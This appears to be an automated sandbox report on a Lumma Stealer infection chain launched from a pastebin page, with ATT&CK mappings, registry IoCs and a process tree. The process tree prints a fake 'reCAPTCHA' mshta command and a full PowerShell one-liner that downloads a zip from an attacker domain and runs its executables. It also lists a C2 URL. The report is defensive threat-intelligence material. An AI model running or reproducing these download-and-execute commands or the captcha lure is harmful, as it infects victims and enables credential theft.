lumma | hxxps://pastebin[.]com/guAYruHv

Analysis

max time kernel
98s
max time network
99s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
17-01-2025 21:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://pastebin.com/guAYruHv

Score

10^/10

lumma discovery execution stealer

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://propierty-hotelid424497.com/captcha

Extracted

Language

ps1

Source

URLs

exe.dropper

https://propierty-hotelid424497.com/captcha/package1.zip

Extracted

Family

lumma

https://impresnyb.cyou/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Blocklisted process makes network request 3 IoCs

flow	pid	Process
227	3016	mshta.exe
229	3016	mshta.exe
232	5108	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
5108	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 2 IoCs

pid	Process
1936	steamerrorreporter.exe
400	steamerrorreporter.exe

Loads dropped DLL 4 IoCs

pid	Process
1936	steamerrorreporter.exe
1936	steamerrorreporter.exe
400	steamerrorreporter.exe
400	steamerrorreporter.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
7	pastebin.com
2	pastebin.com
6	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 400 set thread context of 5092	400	steamerrorreporter.exe	120

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\7c9ad4c5-7734-4a0f-9a64-88ec4fae1121.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250117213450.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steamerrorreporter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steamerrorreporter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3244	msedge.exe
3244	msedge.exe
1124	msedge.exe
1124	msedge.exe
4408	identity_helper.exe
4408	identity_helper.exe
5108	powershell.exe
5108	powershell.exe
5108	powershell.exe
5108	powershell.exe
5108	powershell.exe
1936	steamerrorreporter.exe
400	steamerrorreporter.exe
400	steamerrorreporter.exe
400	steamerrorreporter.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
5092	cmd.exe
5092	cmd.exe
5092	cmd.exe
5092	cmd.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
400	steamerrorreporter.exe
5092	cmd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeDebugPrivilege	3404	taskmgr.exe
Token: SeSystemProfilePrivilege	3404	taskmgr.exe
Token: SeCreateGlobalPrivilege	3404	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
1124	msedge.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe
3404	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1124 wrote to memory of 3116	1124	msedge.exe	81
PID 1124 wrote to memory of 3116	1124	msedge.exe	81
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 224	1124	msedge.exe	82
PID 1124 wrote to memory of 3244	1124	msedge.exe	83
PID 1124 wrote to memory of 3244	1124	msedge.exe	83
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84
PID 1124 wrote to memory of 4772	1124	msedge.exe	84

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://pastebin.com/guAYruHv
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9ab1146f8,0x7ff9ab114708,0x7ff9ab114718
  2⤵
  PID:3116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
  2⤵
  PID:224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
  2⤵
  PID:4772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:3576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
  2⤵
  PID:3240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
  2⤵
  PID:4908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
  2⤵
  PID:1048
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6244 /prefetch:8
  2⤵
  PID:4704
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:1120
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff68ea45460,0x7ff68ea45470,0x7ff68ea45480
    3⤵
    PID:4352
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6244 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1
  2⤵
  PID:928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
  2⤵
  PID:2156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
  2⤵
  PID:2248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
  2⤵
  PID:3480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
  2⤵
  PID:3304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
  2⤵
  PID:4912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:1
  2⤵
  PID:3940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
  2⤵
  PID:1524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:1
  2⤵
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,609575438546785055,18355046360158285956,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6684 /prefetch:1
  2⤵
  PID:4748

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2124

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3024

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://propierty-hotelid424497.com/captcha # ✅ ''I am not a robot - reCAPTCHA Verification ID: 4345''
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:3016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$url = 'https://propierty-hotelid424497.com/captcha/package1.zip'; $tempPath = [IO.Path]::GetTempPath(); $fileName = 'lumprox.zip'; $destination = Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; if (Test-Path $destination) { Expand-Archive -Path $destination -DestinationPath $tempPath -Force; $exeFiles = Get-ChildItem -Path $tempPath -Filter *.exe -File; foreach ($exe in $exeFiles) { Start-Process -FilePath $exe.FullName -NoNewWindow } } else { Write-Host '\u00D0\u017E\u00D1\u02C6\u00D0\u00B8\u00D0\u00B1\u00D0\u00BA\u00D0\u00B0: \u00D1\u201E\u00D0\u00B0\u00D0\u00B9\u00D0\u00BB \u00D0\u00BD\u00D0\u00B5 \u00D0\u00B1\u00D1\u2039\u00D0\u00BB \u00D0\u00B7\u00D0\u00B0\u00D0\u00B3\u00D1\u20AC\u00D1\u0192\u00D0\u00B6\u00D0\u00B5\u00D0\u00BD.' }"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5108
- - C:\Users\Admin\AppData\Local\Temp\steamerrorreporter.exe
    "C:\Users\Admin\AppData\Local\Temp\steamerrorreporter.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1936
  - - C:\Users\Admin\AppData\Roaming\UninstallPluginME\steamerrorreporter.exe
      C:\Users\Admin\AppData\Roaming\UninstallPluginME\steamerrorreporter.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:400
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:5092
      - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5316

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3404

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5412

C:\Windows\System32\msg.exe
"C:\Windows\System32\msg.exe"
1⤵
PID:5592

C:\Windows\System32\msg.exe
"C:\Windows\System32\msg.exe"
1⤵
PID:5772

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe"
1⤵
PID:5840

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe"
1⤵
PID:5892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
254fc2a9d1a15f391d493bff79f66f08

SHA1
6165d5a9de512bb33a82d99d141a2562aa1aabfb

SHA256
